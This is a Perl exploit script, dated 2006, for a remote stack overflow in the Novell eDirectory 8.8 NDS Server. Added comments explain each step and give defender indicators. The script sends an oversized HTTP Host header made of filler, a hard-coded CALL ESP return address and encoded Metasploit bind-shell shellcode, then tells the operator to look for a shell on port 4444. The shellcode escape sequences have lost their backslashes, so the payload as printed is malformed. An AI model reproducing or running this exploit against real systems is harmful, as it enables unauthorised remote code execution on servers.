
# Title : Novell eDirectory 8.8 NDS Server Remote Stack Overflow Exploit
# Published : 2006-10-28
# Author : FistFuXXer


#!perl
#
# "Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit
#
# Author:  Manuel Santamarina Suarez
# e-Mail:  FistFuXXer@gmx.de
#

use IO::Socket;

#
# destination IP address
#
# Hard-coded target. 192.168.1.25 is an RFC 1918 private address, presumably
# the author's lab host. The script has no `use strict` and declares nothing
# with `my`, so this and the variables below are package globals.
#
$ip = '192.168.1.25';

#
# destination TCP port
#
# NOTE(review): presumably the HTTP listener of the eDirectory NDS server named
# in the title -- confirm against the vendor advisory for the deployed version.
#
$port = 8028;

#
# RETurn address. 0x00, 0x0a, 0x0d, 0x3a free
#
# Value placed where the saved return address is expected. The author's note
# says it refers to a CALL ESP instruction in MFC42U (5f833b7a), so it depends
# on one specific build of that DLL being loaded in the target process.
# reverse() is called in scalar context here, so it reverses the string
# character by character (presumably to obtain little-endian order).
# The four excluded values are NUL, LF, CR and ':'; presumably they would end
# or split the HTTP header that carries the data -- confirm.
#
$ret = reverse( "x5Fx83x3Bx7A" );  # CALL ESP
                                      # MFC42U.5f833b7a

#
# 0x00, 0x0a, 0x0d, 0x3a free shellcode
#
# win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
# Payload that the script appends after the return address in the Host header.
# According to the generator line above it is a Windows bind-shell payload for
# TCP 4444, encoded to avoid the four listed byte values. The contents are
# opaque in this listing and have not been decoded or verified here.
#
# Defender note: a new listener on TCP 4444 on a host running the NDS server
# is the outcome the script's final message tells its operator to look for, so
# an unexpected listener or inbound connection on that port is the matching
# host and network indicator.
#
$sc = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
     "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
     "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
     "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
     "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e".
     "x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx38".
     "x4ex56x46x42x46x32x4bx58x45x44x4ex43x4bx48x4ex57".
     "x45x30x4ax37x41x50x4fx4ex4bx38x4fx44x4ax51x4bx48".
     "x4fx35x42x42x41x50x4bx4ex49x54x4bx48x46x43x4bx38".
     "x41x50x50x4ex41x33x42x4cx49x49x4ex4ax46x38x42x4c".
     "x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
     "x46x4fx4bx53x46x55x46x42x4ax42x45x57x45x4ex4bx48".
     "x4fx35x46x52x41x30x4bx4ex48x36x4bx58x4ex50x4bx54".
     "x4bx58x4fx45x4ex31x41x50x4bx4ex43x50x4ex52x4bx38".
     "x49x38x4ex46x46x42x4ex41x41x46x43x4cx41x53x4bx4d".
     "x46x36x4bx58x43x44x42x33x4bx48x42x44x4ex50x4bx58".
     "x42x47x4ex51x4dx4ax4bx58x42x54x4ax50x50x45x4ax36".
     "x50x38x50x54x50x50x4ex4ex42x45x4fx4fx48x4dx48x46".
     "x43x35x48x56x4ax56x43x33x44x53x4ax46x47x57x43x47".
     "x44x53x4fx55x46x35x4fx4fx42x4dx4ax56x4bx4cx4dx4e".
     "x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx35x49x38x45x4e".
     "x48x56x41x48x4dx4ex4ax50x44x50x45x35x4cx46x44x30".
     "x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x45".
     "x4fx4fx48x4dx43x35x43x35x43x35x43x35x43x35x43x54".
     "x43x45x43x34x43x55x4fx4fx42x4dx48x46x4ax46x41x31".
     "x4ex45x48x36x43x45x49x58x41x4ex45x39x4ax36x46x4a".
     "x4cx41x42x37x47x4cx47x55x4fx4fx48x4dx4cx36x42x41".
     "x41x55x45x55x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x42".
     "x49x4ex47x55x4fx4fx48x4dx43x45x45x35x4fx4fx42x4d".
     "x4ax46x45x4ex49x34x48x38x49x54x47x35x4fx4fx48x4d".
     "x42x55x46x55x46x45x45x45x4fx4fx42x4dx43x59x4ax36".
     "x47x4ex49x37x48x4cx49x57x47x55x4fx4fx48x4dx45x45".
     "x4fx4fx42x4dx48x36x4cx36x46x56x48x46x4ax56x43x36".
     "x4dx46x49x38x45x4ex4cx56x42x45x49x35x49x32x4ex4c".
     "x49x58x47x4ex4cx56x46x44x49x48x44x4ex41x53x42x4c".
     "x43x4fx4cx4ax50x4fx44x34x4dx52x50x4fx44x54x4ex52".
     "x43x59x4dx48x4cx37x4ax53x4bx4ax4bx4ax4bx4ax4ax36".
     "x44x47x50x4fx43x4bx48x51x4fx4fx45x57x46x44x4fx4f".
     "x48x4dx4bx55x47x55x44x35x41x55x41x35x41x55x4cx46".
     "x41x50x41x45x41x55x45x45x41x35x4fx4fx42x4dx4ax46".
     "x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx56".
     "x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx38x47x45x4ex4f".
     "x43x48x46x4cx46x56x4fx4fx48x4dx44x55x4fx4fx42x4d".
     "x4ax36x50x57x4ax4dx44x4ex43x37x43x45x4fx4fx48x4d".
     "x4fx4fx42x4dx5a";

# Banner printed before any network activity.
print '"Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit'."nn";

# Open one TCP connection to $ip:$port with a 2 second timeout.
# `and` binds tighter than `or`, so when new() returns false the error text
# is printed and the script exits with status 1.
$sock = IO::Socket::INET->new
(

   PeerAddr => $ip,
   PeerPort => $port,
   Proto    => 'tcp',
   Timeout  => 2

) or print '[-] Error: Could not establish a connection to the server!' and exit(1);

print "[+] Connected.n";
print "[+] Trying to overwrite RETurn address...n";

# The whole request is a request line for /nds followed by a single Host
# header. `x` binds tighter than `.`, so the header value is 'SEXY' repeated
# 17 times as filler, then $ret, then $sc. The title calls the flaw a stack
# overflow; the Host value is the only oversized field sent, so presumably it
# is what the server copies into a fixed-size stack buffer -- confirm against
# the advisory.
#
# Defender note: the request is recognisable on the wire as a GET for /nds
# whose Host header is far longer than any valid host name and is not a host
# name at all. Alerting on or rejecting oversized Host headers in front of
# this service, limiting which networks can reach the port, and installing
# the vendor's fixed release are the corresponding mitigations.
$sock->send( "GET /nds HTTP/1.1rn" );
$sock->send( 'Host: ' . 'SEXY' x 17 . $ret . $sc . "rnrn" );

# The return values of send() are not checked and no response is read, so this
# message is printed whether or not the server was affected.
print "[+] Done. Now check for bind shell on $ip:4444!";

close( $sock );

# www.Syue.com [2006-10-28]